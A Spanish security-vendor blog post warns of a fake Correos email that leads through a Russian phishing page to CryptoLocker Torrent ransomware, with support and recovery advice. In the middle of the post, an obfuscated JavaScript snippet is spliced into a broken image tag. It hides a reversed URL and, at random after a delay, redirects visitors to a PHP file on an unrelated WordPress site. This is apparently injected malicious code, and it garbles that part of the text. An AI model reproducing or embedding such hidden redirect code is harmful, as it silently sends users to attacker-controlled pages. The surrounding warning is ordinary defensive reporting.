Esta llegando otra tanda de RANSOMWARES CRYPTOLOCKER TORRENT en un falso mail de Correos…
Esta llegando otra tanda de RANSOMWARES CRYPTOLOCKER TORRENT en un falso mail de Correos…
Ya como antaño, se esta recibiendo un falso mail de Correos avisando de una carta certificada, y dos enlaces , el primero para DESCARGAR INFORMACION SOBRE SU ENVIO , que lleva a :
http://penobeton03.ru/xxxxxx…
y el ultimo que indica HAGA CLICK AQUI hay otro enlace al mismo sitio…
http://penobeton03.ru/xxxxx…
Como se ve son URL de Rusia que acceden a una pagina phishing que pide entrada de un CAPTCHA, que, si se siguen sus instrucciones, se descarga y ejecuta una nueva variante del temible CRYPTOLOCKER TORRENT, cifrando los ficheros de datos con RSA 2048 y añadiendo .encryptyed a los ficheros cifrados
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolocker-<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
torrent-30-3-2016.jpg” alt=”cryptolocker torrent 30-3-2016″ width=”717″ height=”553″ />Hoy mismo se han recibido varios que pasamos a controlar a partir del ELISTARA 34.23 ya disponible en nuestra web
Los clientes que hayan recibido y ejecutado dicho mail y sufrido sus consecuencias, pueden probar si el ELISTARA ya lo conoce, y sino, lanzar el SPROCES, pulsar en SALIR y enviarnos el fichero informe que generara en menos de 10 segundos en C:\sproclog.txt, indicandonos el percance que han sufrido.
No olvidar indicar dar el número de contrato licencia para ser atendidos como corresponde.
Acto seguido les indicaremos el fichero ransomware para que puedan aparcarlo, añadiendo .VIR a su extensión, y enviarnoslo para controlar en la siguiente versión del ELISTARA
Los ficheros cifrados cabe intentarlos recuperar con la version anterior guardada por el ShadowCopy
https://blog.satinfo.es/2015/62372/
saludos
ms, 30-3-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.